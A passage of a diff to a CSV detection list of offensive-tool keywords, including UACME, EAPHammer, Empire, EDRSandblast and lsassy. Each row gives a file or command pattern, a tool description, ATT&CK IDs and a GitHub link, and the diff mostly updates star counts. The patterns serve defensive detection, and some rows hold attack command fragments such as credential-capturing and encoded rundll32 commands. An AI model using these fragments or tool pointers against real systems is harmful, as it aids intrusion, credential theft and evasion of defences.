Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1825","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z" -"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1826","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z" +"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*EasyHook-Managed*InjectionLoader.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed*WOW64Bypass.*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed/LocalHook.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*Ebowla-master.zip*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*echo * > \\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*echo * > \\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*echo */24 | dnsx -silent -resp-only -ptr*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*echo '8.8.8.8' | hakrevdns*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*echo -n 'cmd /c start rundll32 *.dll* | base64*","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*echo 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*echoac-poc-main*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" "*echowrecker*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*Ed1s0nZ/cool/*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" -"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*edge1.parrot.run*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*EditC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*edraser.py -*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*EDRaser-main*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*EDRSandblast.c*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*EDRSandblast.sln*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_CLI*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable 